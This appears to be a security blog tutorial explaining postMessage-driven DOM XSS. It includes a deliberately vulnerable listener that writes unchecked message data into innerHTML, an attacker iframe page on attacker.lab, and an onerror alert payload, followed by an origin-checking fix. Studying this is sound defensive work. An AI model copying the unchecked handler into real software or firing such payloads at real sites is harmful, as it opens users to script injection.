Post Message Attack

Today i will speak about post messages in javascript and how it can cause cross site scripting on web applications.
first we need to understand what is same origin policy.

Same Origin Policy

most of use asked themselves What Prevents HOST A to use java script and read/write resources on HOST B??
well that is the purpose of same origin policy , Host A can’t access resources on Host B unless some conditions are met
1. same hostname
2. same protocol
3. same port
the following image shows what is this mean.

To allow cross origin communication CORS headers are used, i will not go through SOP and CORS header in deep details, so let’s start what is Post Message in javascript.

PostMessages

PostMessage is a work around to perform cross origin requests(replacement of XHR with CORS headers,

The postMessage method safely enables cross-origin communication between Window objects like

  1. a page and a pop-up that it spawned,
  2. a page and an iframe embedded within it.

The next photo shows how post messages happens between a page and an iframe from different domain.

Now let’s see a quick tutorial about how post messages work.
below code is a sample vulnerable web application.

<html>
<h1>This is a domain vulnerable to POST Message Attack which can lead to Reflected CrossSiteScripting</h1>
<p id="messageid" >This paragraph will be replaced with a PostMessage</p>

<script type="text/javascript">
	
window.addEventListener("message", HandleMessage);

function HandleMessage(message){

	 
var receivedMessage="I received a message from domain <b>"+ message.origin + "</b> and the message says <b>"+ message.data + "</b>";
	document.getElementById("messageid").innerHTML = receivedMessage;
}

</script>
</html>

What is happening is that a post message listner is being created using addEventListner, when a message is received it’s handled using HandleMessage function, the functions create a string varriable and modify the paragraph with id messageid with message content.
Below is a photo of the front end vulnerable application

So let’s send this website a message from another domain attacker.lab, as discussed previously we can either exploit this from an iframe or a popup message.
so let’s examine the Iframe code exploit.

<h1> This is attacker exploit page which loads the vulnerable site in an iframe</h1>
<script>
function SendMessage() {
  var IframeElement = document.getElementById('VulnerableSiteIframe');
  var message = "Hello";
  IframeElement.contentWindow.postMessage(message, '*');
};
</script>
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="http://victim.lab/PostMessage/receiver.html" onload="SendMessage()"></iframe>

an iframe is created reference by id VulnerableSiteIframe and loads the vulnerable page http://victim.lab/PostMessage/receiver.html
once iframe is loaded a function called SendMessage is executed.
The function creates an Iframe object with the ID of the vulnerable website and then creates a string variable message which contains the word “Hello” which will be send to the vulnerable domain using post message by the below syntax
IframeElement.contentWindow.postMessage(message, ‘*’);
the * means that this post message can be received by anydomain.

Now let’s host the exploit on attacker.lab, we will find the following.

We can find that message is received from domain attacker.lab and the message is saying Hello.
So we can conclude that this can lead to DOM Based Cross-Site Scripting.
var message=”<img src=x onerror=alert(document.domain);>”
once we load the exploit code we will find XSS fires

This is because the vulnerable site is accepting post messages from any domain an if condition that checks origin source should be there to prevent such attacks,
a non vulnerable code is as below.

<html>
<h1>This is a domain vulnerable to POST Message Attack which can lead to Reflected CrossSiteScripting</h1>
<p id="messageid" >This paragraph will be replaced with a PostMessage</p>


<script type="text/javascript">
	
window.addEventListener("message", HandleMessage);

function HandleMessage(message){

	 if(/^http:\/\/trusteddomain\.victim\.lab$/.test(message.origin)){
var receivedMessage="I received a message from domain <b>"+ message.origin + "</b> and the message says <b>"+ message.data + "</b>";
	document.getElementById("messageid").innerHTML = receivedMessage;
}
}

</script>
</html>

Finally below is a link for a quick tutorial on PostMessages in Arabic language.
https://www.youtube.com/watch?v=rbHC3DHk6Vg
additionally link for the source code can be found here.
https://hacked0x90.net/Uploads/PostMessage.zip

1 thought on “Post Message Attack”

Leave a Reply

Your email address will not be published. Required fields are marked *